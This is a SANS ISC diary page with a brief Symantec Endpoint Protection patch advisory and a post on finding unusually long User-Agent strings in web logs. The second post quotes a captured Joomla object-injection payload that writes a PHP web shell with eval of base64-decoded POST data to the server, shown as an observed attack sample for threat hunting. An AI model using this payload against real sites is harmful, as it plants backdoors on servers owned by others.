Threat Level: green Handler on Duty: John Bambenek

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2016-06-29 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Critical Symantec Endpoint Protection Vulnerability

Published: 2016-06-29
Last Updated: 2016-06-29 19:26:52 UTC
by Johannes Ullrich (Version: 1)
1 comment(s)

Google's "Project Zero" released details about a number of critical vulnerabilities in Symantec's Endpoint Protection prodoct [1]. The vulnerabilities allow for arbitrary code execution on systems with this product installed. Other Symantec products are affected as well , since the vulnerabilities affect the core scanning engine in Symantec Endpoint Protection.

Symantec has released updates, and given the details released by Google you should update as soon as possible. You will need to update the actual Symantec product, which is different from performing a signature update (the signature update happens automatically)

[1] http://googleprojectzero.blogspot.ca/2016/06/how-to-compromise-enterprise-endpoint.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Keywords:
1 comment(s)
ISC Stormcast For Wednesday, June 29th 2016 http://isc.sans.edu/podcastdetail.html?id=5061

What is your most unusual User-Agent?

Published: 2016-06-29
Last Updated: 2016-06-29 00:55:34 UTC
by Johannes Ullrich (Version: 1)
5 comment(s)

When looking at my web logs, I am always out to hunt for anomalies. Today, after seeing some odd and long user agents, I figured it would be fun to look for the longest once that I can find in my logs. First of all: how?

Fist, I am extracting the User Agent string from my web server access log:

cut -f 6 -d'"' access_log > /tmp/useragents 
 (this may look different for you if you use a different log format)

Next, sorting the result by line length:

cat /tmp/useragents | awk '{ print length, $0 }' | sort -n -s | cut -d" " -f2- | uniq

So finally some of the "winners"

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 OWASMIME/4.0500 (...) 
 OWASMIME/4.0500 is repeated many times.  No idea what this is about. A buggy script?
}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;
O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;
a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;
O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;
s:254:\x22file_put_contents($_SERVER[\x22DOCUMENT_ROOT\x22].chr(47).\x22images\x22.
chr(47).\x22main.php\x22,\x22|=|\x5Cx3C\x22.chr(63).\x22php \x5Cx24mujj=\x5Cx24_POST['@123'];if(\x5Cx24mujj!='')
{\x5Cx24xsser=base64_decode(\x5Cx24_POST['z0']);
@eval(\x5C\x22\x5C\x5C\x5Cx24safedg=\x5Cx24xsser;\x5C\x22);}\x22);
JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;
s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;
O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}~\xD9

An exploit for an OLD Joomla issue if I remember right? This stuff still works?

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; 
.NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0;
 GWX:MANAGED; GWX:DOWNLOADED; GWX:QUALIFIED; InfoPath.3; MALCJS; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; ms-office; MSOffice 15)

Again. Lots of duplicate content. Do you REALLY have to tell me what version of Outlook you are running? I know you are proud of your tablet...

Oddly enough, no shell shock today. 

What is your longest User-Agent if you search your weblogs?

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Keywords:
5 comment(s)
Diary Archives